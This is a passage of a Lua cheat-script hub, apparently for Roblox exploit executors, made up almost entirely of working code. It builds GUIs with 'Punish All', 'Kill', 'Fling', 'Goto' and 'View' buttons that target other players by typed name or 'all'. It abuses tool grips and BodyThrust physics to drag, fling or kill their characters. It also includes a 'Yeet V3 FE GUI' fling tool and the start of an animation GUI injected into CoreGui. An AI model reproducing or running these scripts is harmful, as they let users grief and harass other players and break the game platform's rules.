LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(1 * Spread_Amount - math.random(1, 6), 1 * Spread_Amount, -1 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(-1 * Spread_Amount - math.random(1, 6), -1 * Spread_Amount, -2 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(1 * Spread_Amount - math.random(1, 6), 0.1 * Spread_Amount, -4 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2 * Spread_Amount - math.random(1, 6), 0.1 * Spread_Amount, -2.5 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(5 * Spread_Amount - math.random(1, 6), 3 * Spread_Amount, -3 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2 * Spread_Amount - math.random(1, 6), -1 * Spread_Amount, -2 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(1.5 * Spread_Amount - math.random(1, 6), .2 * Spread_Amount, -3 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2.5 * Spread_Amount - math.random(1, 6), .6 * Spread_Amount, -4 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2 * Spread_Amount - math.random(1, 6), 0.1 * Spread_Amount, -1 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(3 * Spread_Amount - math.random(1, 6), 0 * Spread_Amount, -2 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(5 * Spread_Amount - math.random(1, 6), .2 * Spread_Amount, -6 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(3 * Spread_Amount - math.random(1, 6), -.2 * Spread_Amount, -5 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(1 * Spread_Amount - math.random(1, 6), 3 * Spread_Amount, -1 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2 * Spread_Amount - math.random(1, 6), 2 * Spread_Amount, -5 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(4 * Spread_Amount - math.random(1, 6), 1 * Spread_Amount, -1 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(5 * Spread_Amount - math.random(1, 6), 0.3 * Spread_Amount, -3 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character wait() LocalPlayer.Character.Animate.Disabled = true wait() for i = 1, toolamount do LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game:GetService("Workspace").Terrain end wait() for v, i in pairs(game:GetService("Players"):GetChildren()) do i.Character.HumanoidRootPart.CFrame = LocalPlayer.Character["Right Arm"].CFrame end wait() LocalPlayer.Character.Animate.Disabled = false end) PunishAll.Name = "PunishAll" PunishAll.Parent = main PunishAll.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) PunishAll.Position = UDim2.new(0.646532476, 0, 0.316009164, 0) PunishAll.Size = UDim2.new(0, 124, 0, 44) PunishAll.Font = Enum.Font.SourceSansBold PunishAll.FontSize = Enum.FontSize.Size24 PunishAll.Text = "Punish All" PunishAll.TextColor3 = Color3.new(1, 1, 1) PunishAll.TextSize = 20 PunishAll.TextStrokeTransparency = 0 PunishAll.MouseButton1Down:connect(function() local SpreadAmount = 1 local Spread_Amount = SpreadAmount - math.random(.0625, .1875) local toolamount = -8 * -8 / 4 + math.random(-1, 0) local LocalPlayer = game:GetService("Players").LocalPlayer local runservice = game:GetService("RunService") local characters = {} LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools() local currentamount = #LocalPlayer.Backpack:GetChildren() LocalPlayer.Character.Archivable = true local tempchar = LocalPlayer.Character:Clone() tempchar.Parent = workspace local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame local renderstepped = runservice.RenderStepped:Connect(function() game:GetService("Workspace").CurrentCamera.CameraSubject = tempchar:FindFirstChild("Humanoid") for _, tool in pairs(LocalPlayer.Backpack:GetChildren()) do if tool:IsA("Tool") then tool.Parent = LocalPlayer end end LocalPlayer.Character:ClearAllChildren() local char = Instance.new("Model", workspace) table.insert(characters, char) Instance.new("Humanoid", char) LocalPlayer.Character = char repeat runservice.RenderStepped:Wait() until LocalPlayer.Character ~= nil end) repeat runservice.RenderStepped:Wait() until #LocalPlayer:GetChildren() - 4 - currentamount >= toolamount + 1 renderstepped:Disconnect() repeat runservice.RenderStepped:Wait() until LocalPlayer.Character:FindFirstChild("HumanoidRootPart") ~= nil for _, char in pairs(characters) do char:Destroy() end for _, tool in pairs(LocalPlayer:GetChildren()) do if tool:IsA("Tool") then tool.Parent = LocalPlayer.Backpack end end LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos tempchar:Destroy() wait() LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(1 * Spread_Amount - math.random(1, 6), 1 * Spread_Amount, -1 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(-1 * Spread_Amount - math.random(1, 6), -1 * Spread_Amount, -2 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(1 * Spread_Amount - math.random(1, 6), 0.1 * Spread_Amount, -4 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2 * Spread_Amount - math.random(1, 6), 0.1 * Spread_Amount, -2.5 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(5 * Spread_Amount - math.random(1, 6), 3 * Spread_Amount, -3 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2 * Spread_Amount - math.random(1, 6), -1 * Spread_Amount, -2 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(1.5 * Spread_Amount - math.random(1, 6), .2 * Spread_Amount, -3 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2.5 * Spread_Amount - math.random(1, 6), .6 * Spread_Amount, -4 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2 * Spread_Amount - math.random(1, 6), 0.1 * Spread_Amount, -1 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(3 * Spread_Amount - math.random(1, 6), 0 * Spread_Amount, -2 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(5 * Spread_Amount - math.random(1, 6), .2 * Spread_Amount, -6 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(3 * Spread_Amount - math.random(1, 6), -.2 * Spread_Amount, -5 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(1 * Spread_Amount - math.random(1, 6), 3 * Spread_Amount, -1 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(2 * Spread_Amount - math.random(1, 6), 2 * Spread_Amount, -5 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(4 * Spread_Amount - math.random(1, 6), 1 * Spread_Amount, -1 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character LocalPlayer.Backpack:FindFirstChildOfClass("Tool").GripPos = Vector3.new(5 * Spread_Amount - math.random(1, 6), 0.3 * Spread_Amount, -3 * Spread_Amount) LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game:GetService("Players").LocalPlayer.Character wait() LocalPlayer.Character.Animate.Disabled = true wait() for i = 1, toolamount do LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game:GetService("Workspace").Terrain end wait() for v, i in pairs(game:GetService("Players"):GetChildren()) do i.Character.HumanoidRootPart.CFrame = LocalPlayer.Character["Right Arm"].CFrame end wait(math.random(0, .00375)) for i = 1, math.random(2, 8) do wait(math.random(0, .0625)) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0, 1000000000, 0) end end) Page2Button.Name = "Page2Button" Page2Button.Parent = main Page2Button.BackgroundColor3 = Color3.new(0.505882, 0.505882, 0.505882) Page2Button.Position = UDim2.new(0.794183373, 0, 0.874492049, 0) Page2Button.Size = UDim2.new(0, 42, 0, 23) Page2Button.Font = Enum.Font.GothamBlack Page2Button.FontSize = Enum.FontSize.Size14 Page2Button.Text = ">" Page2Button.TextColor3 = Color3.new(0, 0, 0) Page2Button.TextSize = 14 Page2Button.MouseButton1Down:connect(function() main.Visible = false Page2.Visible = true end) Page2.Name = "Page2" Page2.Parent = MainGui Page2.BackgroundColor3 = Color3.new(0.580392, 0.580392, 0.580392) Page2.BorderSizePixel = 0 Page2.Position = UDim2.new(0, 0, 0.283932239, 0) Page2.Size = UDim2.new(0, 446, 0, 238) Page2.Visible = false Goto.Name = "Goto" Goto.Parent = Page2 Goto.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) Goto.Position = UDim2.new(0.0358042195, 0, 0.0740150958, 0) Goto.Size = UDim2.new(0, 124, 0, 44) Goto.Font = Enum.Font.SourceSansBold Goto.FontSize = Enum.FontSize.Size24 Goto.Text = "Goto" Goto.TextColor3 = Color3.new(1, 1, 1) Goto.TextSize = 20 Goto.TextStrokeTransparency = 0 Goto.MouseButton1Down:connect(function() local noob = unpack(GetPlayer(Player.Text)).Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = noob.HumanoidRootPart.CFrame end) View.Name = "View" View.Parent = Page2 View.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) View.Position = UDim2.new(0.346766174, 0, 0.0740150958, 0) View.Size = UDim2.new(0, 124, 0, 44) View.Font = Enum.Font.SourceSansBold View.FontSize = Enum.FontSize.Size24 View.Text = "View" View.TextColor3 = Color3.new(1, 1, 1) View.TextSize = 20 View.TextStrokeTransparency = 0 View.MouseButton1Down:connect(function() for i, v in pairs(GetPlayer(Player.Text)) do if game:GetService("Players")[v.Name].Character.Humanoid then game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Humanoid else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head end end end) Noview.Name = "Noview" Noview.Parent = Page2 Noview.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) Noview.Position = UDim2.new(0.644305348, 0, 0.0740150958, 0) Noview.Size = UDim2.new(0, 124, 0, 44) Noview.Font = Enum.Font.SourceSansBold Noview.FontSize = Enum.FontSize.Size24 Noview.Text = "Unview" Noview.TextColor3 = Color3.new(1, 1, 1) Noview.TextSize = 20 Noview.TextStrokeTransparency = 0 Noview.TextWrapped = true Noview.MouseButton1Down:connect(function() if lplayer.Character.Humanoid then game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Humanoid else game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Head end end) Fling.Name = "Fling" Fling.Parent = Page2 Fling.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) Fling.Position = UDim2.new(0.038031321, 0, 0.316009164, 0) Fling.Size = UDim2.new(0, 124, 0, 44) Fling.Font = Enum.Font.SourceSansBold Fling.FontSize = Enum.FontSize.Size24 Fling.Text = "Fling" Fling.TextColor3 = Color3.new(1, 1, 1) Fling.TextSize = 20 Fling.TextStrokeTransparency = 0 Fling.MouseButton1Down:connect(function() local target = unpack(GetPlayer(Player.Text)).Character game:GetService'Players'.LocalPlayer.Character.Humanoid.PlatformStand = true killing = true local coin = Instance.new('BodyThrust', game:GetService'Players'.LocalPlayer.Character.HumanoidRootPart) coin.Force = Vector3.new(9999, 9999, 9999) coin.Name = "killforce" repeat game:GetService'Players'.LocalPlayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame; coin.Location = target.Head.Position game["Run Service"].Heartbeat:wait() until not target.Head or killing == false end) nofling.Name = "nofling" nofling.Parent = Page2 nofling.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) nofling.Position = UDim2.new(0.348993301, 0, 0.316009164, 0) nofling.Size = UDim2.new(0, 124, 0, 44) nofling.Font = Enum.Font.SourceSansBold nofling.FontSize = Enum.FontSize.Size24 nofling.Text = "Stop Flinging " nofling.TextColor3 = Color3.new(1, 1, 1) nofling.TextSize = 20 nofling.TextStrokeTransparency = 0 nofling.MouseButton1Down:connect(function() ypcall(function() game:GetService'Players'.LocalPlayer.Character.HumanoidRootPart.yeetforce:Destroy() game:GetService'Players'.LocalPlayer.Character.Humanoid.PlatformStand = false end) killing = false end) Kill.Name = "Kill" Kill.Parent = Page2 Kill.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) Kill.Position = UDim2.new(0.646532476, 0, 0.316009164, 0) Kill.Size = UDim2.new(0, 124, 0, 44) Kill.Font = Enum.Font.SourceSansBold Kill.FontSize = Enum.FontSize.Size24 Kill.Text = "Kill" Kill.TextColor3 = Color3.new(1, 1, 1) Kill.TextSize = 20 Kill.TextStrokeTransparency = 0 Kill.MouseButton1Down:connect(function() for i, v in pairs(GetPlayer(Player.Text)) do local LocalPlayer = game:GetService("Players").LocalPlayer local target = game:GetService("Players")[v.Name] local torsoname = "Torso" if LocalPlayer.Character:FindFirstChild("Humanoid").RigType == Enum.HumanoidRigType.R15 then torsoname = "UpperTorso" end if target.Character ~= nil then local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame LocalPlayer.Character:FindFirstChild(torsoname).Anchored = true local tool = Instance.new("Tool", LocalPlayer.Backpack) local hat = LocalPlayer.Character:FindFirstChildOfClass("Accessory") local hathandle = hat.Handle hathandle.Parent = tool hathandle.Massless = true tool.GripPos = Vector3.new(0, 9e99, 0) tool.Parent = LocalPlayer.Character repeat wait() until LocalPlayer.Character:FindFirstChildOfClass("Tool") ~= nil tool.Grip = CFrame.new(Vector3.new(0, 0, 0)) LocalPlayer.Character:FindFirstChild(torsoname).Anchored = false repeat LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = target.Character:FindFirstChild("HumanoidRootPart").CFrame wait() until target.Character == nil or target.Character:FindFirstChild("Humanoid").Health <= 0 or LocalPlayer.Character == nil or LocalPlayer.Character:FindFirstChild("Humanoid").Health <= 0 or (target.Character:FindFirstChild("HumanoidRootPart").Velocity.magnitude - target.Character:FindFirstChild("Humanoid").WalkSpeed) > (target.Character:FindFirstChild("Humanoid").WalkSpeed + 20) LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools() hathandle.Parent = hat hathandle.Massless = false tool:Destroy() LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos end end end) Page3Button.Name = "Page3Button" Page3Button.Parent = Page2 Page3Button.BackgroundColor3 = Color3.new(0.505882, 0.505882, 0.505882) Page3Button.Position = UDim2.new(0.794183373, 0, 0.874492049, 0) Page3Button.Size = UDim2.new(0, 42, 0, 23) Page3Button.Font = Enum.Font.GothamBlack Page3Button.FontSize = Enum.FontSize.Size14 Page3Button.Text = ">" Page3Button.TextColor3 = Color3.new(0, 0, 0) Page3Button.TextSize = 14 Page3Button.MouseButton1Down:connect(function() Page2.Visible = false main.Visible = false Page3.Visible = true end) BackToPage1.Name = "BackToPage1" BackToPage1.Parent = Page2 BackToPage1.BackgroundColor3 = Color3.new(0.505882, 0.505882, 0.505882) BackToPage1.Position = UDim2.new(0.126021922, 0, 0.874492049, 0) BackToPage1.Size = UDim2.new(0, 42, 0, 23) BackToPage1.Font = Enum.Font.GothamBlack BackToPage1.FontSize = Enum.FontSize.Size14 BackToPage1.Text = "<" BackToPage1.TextColor3 = Color3.new(0, 0, 0) BackToPage1.TextSize = 14 BackToPage1.MouseButton1Down:connect(function() Page2.Visible = false main.Visible = true Page3.Visible = false end) Player.Name = "Player" Player.Parent = Page2 Player.BackgroundColor3 = Color3.new(0.54902, 0.54902, 0.54902) Player.Position = UDim2.new(0.260089695, 0, 0.613445401, 0) Player.Size = UDim2.new(0, 200, 0, 50) Player.Font = Enum.Font.SourceSansBold Player.FontSize = Enum.FontSize.Size24 Player.Text = "Username" Player.TextColor3 = Color3.new(0, 0, 0) Player.TextSize = 20 Player.TextWrapped = true Page3.Name = "Page3" Page3.Parent = MainGui Page3.BackgroundColor3 = Color3.new(0.580392, 0.580392, 0.580392) Page3.BorderSizePixel = 0 Page3.Position = UDim2.new(0, 0, 0.283932239, 0) Page3.Size = UDim2.new(0, 446, 0, 238) Page3.Visible = false BackToPage2.Name = "BackToPage2" BackToPage2.Parent = Page3 BackToPage2.BackgroundColor3 = Color3.new(0.505882, 0.505882, 0.505882) BackToPage2.Position = UDim2.new(0.126021922, 0, 0.874492049, 0) BackToPage2.Size = UDim2.new(0, 42, 0, 23) BackToPage2.Font = Enum.Font.GothamBlack BackToPage2.FontSize = Enum.FontSize.Size14 BackToPage2.Text = "<" BackToPage2.TextColor3 = Color3.new(0, 0, 0) BackToPage2.TextSize = 14 BackToPage2.MouseButton1Down:connect(function() Page2.Visible = true main.Visible = false Page3.Visible = false end) TextLabel_3.Parent = Page3 TextLabel_3.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_3.BackgroundTransparency = 1 TextLabel_3.BorderSizePixel = 0 TextLabel_3.Size = UDim2.new(0, 446, 0, 195) TextLabel_3.Font = Enum.Font.SourceSansSemibold TextLabel_3.FontSize = Enum.FontSize.Size48 TextLabel_3.Text = "Made By Hackmaster12" TextLabel_3.TextColor3 = Color3.new(0, 0, 0) TextLabel_3.TextSize = 40 end }) GUIS:AddButton({ Title = "Yeet V3 FE GUI", Description = "Flings Players", Callback = function() local lplayer = game:GetService('Players').LocalPlayer local yeeting = false function GetPlayer(String) local Found = {} local strl = String:lower() if strl == "all" then for i, v in pairs(game:GetService("Players"):GetPlayers()) do table.insert(Found, v) end elseif strl == "others" then for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name ~= lplayer.Name then table.insert(Found, v) end end elseif strl == "me" then for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name == lplayer.Name then table.insert(Found, v) end end else for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found, v) end end end return Found end function ahh(thing) local asd = { 'yeet', 'gui', 'yeet gui' } local f = string.upper(asd[math.random(1, #asd)]) return f end local XD = Instance.new("ScreenGui") local BeGONE = Instance.new("Frame") local TextLabel = Instance.new("TextLabel") local TextLabel_2 = Instance.new("TextLabel") local AA = Instance.new("TextBox") local yets = Instance.new("TextButton") local stopyets = Instance.new("TextButton") local ultrayets = Instance.new("TextButton") local ImageLabel = Instance.new("ImageLabel") local TextLabel_3 = Instance.new("TextLabel") XD.Name = "XD" XD.Parent = game:GetService('CoreGui') BeGONE.Name = "BeGONE" BeGONE.Parent = XD BeGONE.Active = true BeGONE.Draggable = true BeGONE.BackgroundColor3 = Color3.new(0.219608, 0.219608, 0.219608) BeGONE.BorderSizePixel = 0 BeGONE.Position = UDim2.new(-0.0207920745, 111, 0.722570539, -1) BeGONE.Size = UDim2.new(0, 389, 0, 129) TextLabel.Parent = BeGONE TextLabel.BackgroundColor3 = Color3.new(1, 0.419608, 0.129412) TextLabel.BorderSizePixel = 0 TextLabel.Size = UDim2.new(0, 389, 0, 22) TextLabel.Font = Enum.Font.Cartoon TextLabel.Text = "fe yeet gui v3 (yes v3 xd) by scuba kermit" TextLabel.TextColor3 = Color3.new(0, 0, 0) TextLabel.TextSize = 16 TextLabel.TextWrapped = true TextLabel_2.Parent = BeGONE TextLabel_2.BackgroundColor3 = Color3.new(0.831373, 0.509804, 0.054902) TextLabel_2.BorderSizePixel = 0 TextLabel_2.Position = UDim2.new(0, 0, 0.169230849, 0) TextLabel_2.Size = UDim2.new(0, 389, 0, 9) TextLabel_2.Font = Enum.Font.SourceSans TextLabel_2.Text = "" TextLabel_2.TextColor3 = Color3.new(0, 0, 0) TextLabel_2.TextSize = 14 AA.Name = "AA" AA.Parent = BeGONE AA.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) AA.BorderSizePixel = 0 AA.Position = UDim2.new(0.20364143, 0, 0.299216866, 0) AA.Size = UDim2.new(0, 229, 0, 35) AA.Font = Enum.Font.SourceSans AA.PlaceholderColor3 = Color3.new(0.831373, 0.831373, 0.831373) AA.PlaceholderText = "Player you wanna yeet (can be shortened)" AA.Text = "" AA.TextColor3 = Color3.new(1, 1, 1) AA.TextSize = 14 AA.TextWrapped = true yets.Name = "yets" yets.Parent = BeGONE yets.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) yets.BorderSizePixel = 0 yets.Position = UDim2.new(0.0364736132, 0, 0.646153867, 0) yets.Size = UDim2.new(0, 94, 0, 28) yets.Font = Enum.Font.SourceSans yets.Text = "Y E E T" yets.TextColor3 = Color3.new(1, 1, 1) yets.TextSize = 14 yets.TextWrapped = true stopyets.Name = "stopyets" stopyets.Parent = BeGONE stopyets.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) stopyets.BorderSizePixel = 0 stopyets.Position = UDim2.new(0.722082794, 0, 0.646153867, 0) stopyets.Size = UDim2.new(0, 94, 0, 28) stopyets.Font = Enum.Font.SourceSans stopyets.Text = "Stop Y E E T ing" stopyets.TextColor3 = Color3.new(1, 1, 1) stopyets.TextSize = 14 stopyets.TextWrapped = true ultrayets.Name = "ultrayets" ultrayets.Parent = BeGONE ultrayets.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431) ultrayets.BorderSizePixel = 0 ultrayets.Position = UDim2.new(0.298684418, 0, 0.646154106, 0) ultrayets.Size = UDim2.new(0, 156, 0, 28) ultrayets.Font = Enum.Font.SourceSans ultrayets.Text = "U L T R A Y E E T" ultrayets.TextColor3 = Color3.new(1, 1, 1) ultrayets.TextSize = 14 ultrayets.TextWrapped = true ImageLabel.Parent = XD ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1) ImageLabel.BackgroundTransparency = 1 ImageLabel.BorderSizePixel = 0 ImageLabel.Position = UDim2.new(0.9, 0, 0.835423172, 0) ImageLabel.Size = UDim2.new(0, 100, 0, 100) ImageLabel.Image = "rbxassetid://2152234287" TextLabel_3.Parent = ImageLabel TextLabel_3.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_3.BackgroundTransparency = 1 TextLabel_3.BorderSizePixel = 0 TextLabel_3.Position = UDim2.new(0.110989988, 0, 0.103538811, 0) TextLabel_3.Size = UDim2.new(0, 77, 0, 23) TextLabel_3.Font = Enum.Font.Arial TextLabel_3.Text = "yeet gui" TextLabel_3.TextColor3 = Color3.new(0, 0, 0) TextLabel_3.TextSize = 14 yets.MouseButton1Click:Connect(function() local target = unpack(GetPlayer(AA.Text)).Character game:GetService'Players'.LocalPlayer.Character.Humanoid.PlatformStand = true yeeting = true local coin = Instance.new('BodyThrust', game:GetService'Players'.LocalPlayer.Character.HumanoidRootPart) coin.Force = Vector3.new(2590, 0, 2590) coin.Name = "yeetforce" repeat game:GetService'Players'.LocalPlayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame; coin.Location = target.Head.Position game["Run Service"].Heartbeat:wait() until not target.Head or yeeting == false end) stopyets.MouseButton1Click:Connect(function() ypcall(function() game:GetService'Players'.LocalPlayer.Character.HumanoidRootPart.yeetforce:Destroy() game:GetService'Players'.LocalPlayer.Character.Humanoid.PlatformStand = false end) yeeting = false end) ultrayets.MouseButton1Click:Connect(function() local target = unpack(GetPlayer(AA.Text)).Character game:GetService'Players'.LocalPlayer.Character.Humanoid.PlatformStand = true yeeting = true local coin = Instance.new('BodyThrust', game:GetService'Players'.LocalPlayer.Character.HumanoidRootPart) coin.Force = Vector3.new(9999, 9999, 9999) coin.Name = "yeetforce" repeat game:GetService'Players'.LocalPlayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame; coin.Location = target.Head.Position game["Run Service"].Heartbeat:wait() until not target.Head or yeeting == false end) while game["Run Service"].Heartbeat:wait() do ImageLabel.Rotation = ImageLabel.Rotation + 1 TextLabel_3.Text = ahh('yeet gui') end end }) GUIS:AddButton({ Title = "Energize FE GUI", Description = "Animations", Callback = function() -- Energize by illremember, fe animations -- DO NOT COPY AND CLAIM AS OWN, if you are using some of the script for your own, credit is highly appreciated! -- Thank you, and enjoy. -- Objects local Energize = Instance.new("ScreenGui") -- The actual GUI local SideFrame = Instance.new("Frame") -- Visible when GUI is closed local OpenGUI = Instance.new("TextButton") -- Part of SideFrame local SideFrameTitle = Instance.new("TextLabel") -- Part of SideFrame local MainFrame = Instance.new("Frame") -- All of the stuff on the main frame local GuiBottomFrame = Instance.new("Frame") -- Part of Active Frame local Credits = Instance.new("TextLabel") -- Credits to illremember, hello there local ScrollingFrame = Instance.new("ScrollingFrame") -- The scrolling frame of animations local CheckR = Instance.new("TextLabel") -- Check if R15 or R6 local ScrollingFrameR15 = Instance.new("ScrollingFrame") -- The scrolling frame of R15 animations local CrazySlash = Instance.new("TextButton")--COMPLETE local Open = Instance.new("TextButton")--COMPLETE local R15Spinner = Instance.new("TextButton")--COMPLETE local ArmsOut = Instance.new("TextButton")--COMPLETE local FloatSlash = Instance.new("TextButton")--COMPLETE local WeirdZombie = Instance.new("TextButton")--COMPLETE local DownSlash = Instance.new("TextButton")--COMPLETE local Pull = Instance.new("TextButton")--COMPLETE local CircleArm = Instance.new("TextButton")--COMPLETE local Bend = Instance.new("TextButton")--COMPLETE local RotateSlash = Instance.new("TextButton")--COMPLETE local FlingArms = Instance.new("TextButton")--COMPLETE local FullSwing = Instance.new("TextButton")--COMPLETE local GlitchLevitate = Instance.new("TextButton")--COMPLETE local MoonDance = Instance.new("TextButton")--COMPLETE local FullPunch = Instance.new("TextButton")--COMPLETE local Crouch = Instance.new("TextButton")--COMPLETE local SpinDance = Instance.new("TextButton")--COMPLETE local FloorFaint = Instance.new("TextButton")--COMPLETE local JumpingJacks = Instance.new("TextButton")--COMPLETE local Spinner = 